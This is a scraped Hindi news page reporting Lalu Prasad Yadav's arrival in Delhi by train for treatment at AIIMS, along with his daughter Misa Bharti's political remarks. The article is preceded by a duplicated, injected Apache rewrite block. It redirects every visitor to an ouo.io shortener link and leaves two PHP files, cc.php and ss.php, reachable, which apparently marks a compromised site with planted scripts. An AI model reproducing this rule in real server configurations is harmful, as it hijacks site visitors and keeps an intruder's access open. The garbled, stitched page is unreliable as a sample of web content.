
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 414
Previousनई दिल्ली। चारा घोटाले में सजा काट रहे राष्ट्रीय जनता दल (आरजेडी) सुप्रीमो व बिहार के पूर्व मुख्यमंत्री लालू प्रसाद यादव आज रांची राजधानी एक्सप्रेस के जरिये दिल्ली पहुंचे। सुबह 11.41 बजे उनकी ट्रेन नई दिल्ली रेलवे स्टेशन के प्लेटफॉर्म नंबर 16 पर पहुंची, जहां से वीआइपी गेट के जरिये उन्हें पुख्ता सुरक्षा इंतजामों के बीच एम्स में इलाज के लिए रवाना कर दिया गया। लालू को नई दिल्ली रेलवे स्टेशन पर लेने के लिए उनकी बेटी मीसा भारती व राजद नेता राजनारायण समेत अन्य नेता भी पहुंचे। लालू यादव को अखिल भारतीय आयुर्विज्ञान संस्थान (एम्स) के इमरजेंसी में भर्ती कराया गया है। वहां से उन्हें प्राइवेट वार्ड में स्थानांतरित किया जा सकता है। मीसा भारती ने कहा कि लालू यादव को विमान से दिल्ली लाना चाहिए था, क्योंकि उनकी तबीयत बहुत खराब है। मीसा ने बिहार में हो रहे दंगों को लेकर भी नीतीश सरकार पर जमकर निशाना साधा। उन्होंने कहा कि बिहार में डबल इंजन की सरकार चल रही है। यही वजह है कि दंगे में आरोपी केंद्रीय मंत्री अश्विनी चौबे के बेटे पर कोई कार्रवाई नहीं हो रही है, बल्कि उनके पिता अपने बेटे की तुलना महात्मा गांधी से कर रहे हैं। वहीं, तीसरे मोर्च के सवाल पर मीसा ने कहा कि हर क्षेत्रीय पार्टी को तीसरा मोर्चा समझा जाता है, अब यही पार्टियां मिल रही हैं, जो भाजपा को बाहर कर देंगी। लालू यादव के दिल्ली पहुंचने पर उनके पूरे परिवार की नजर थी। नई दिल्ली रेलवे स्टेशन पर रांची राजधानी एक्सप्रेस से दिल्ली पहुंचे लालू यादव जैसे ही प्लेटफॉर्म नंबर 16 पर ट्रेन से उतरे तो कुलियों ने लालू यादव के समर्थन में नारेबाजी शुरू कर दी। लालू यादव जिंदाबाद समेत देश का नेता लालू यादव जैसा हो के नारे लगा दिए। जब तक लालू गाड़ी में बैठकर एम्स के लिए रवाना नहीं हो गए, तब तक कुली लालू के समर्थन में नारेबाजी करते रहे। कुली नेमचंद का कहना था कि वह राजस्थान के रहने वाले हैं, लालू जब केंद्र सरकार में रेलमंत्री थे तो उन्होंने कुलियों को नौकरी दी थी। इसी वजह से वह उनके यहां पहुंचने पर नारेबाजी कर रहे हैं।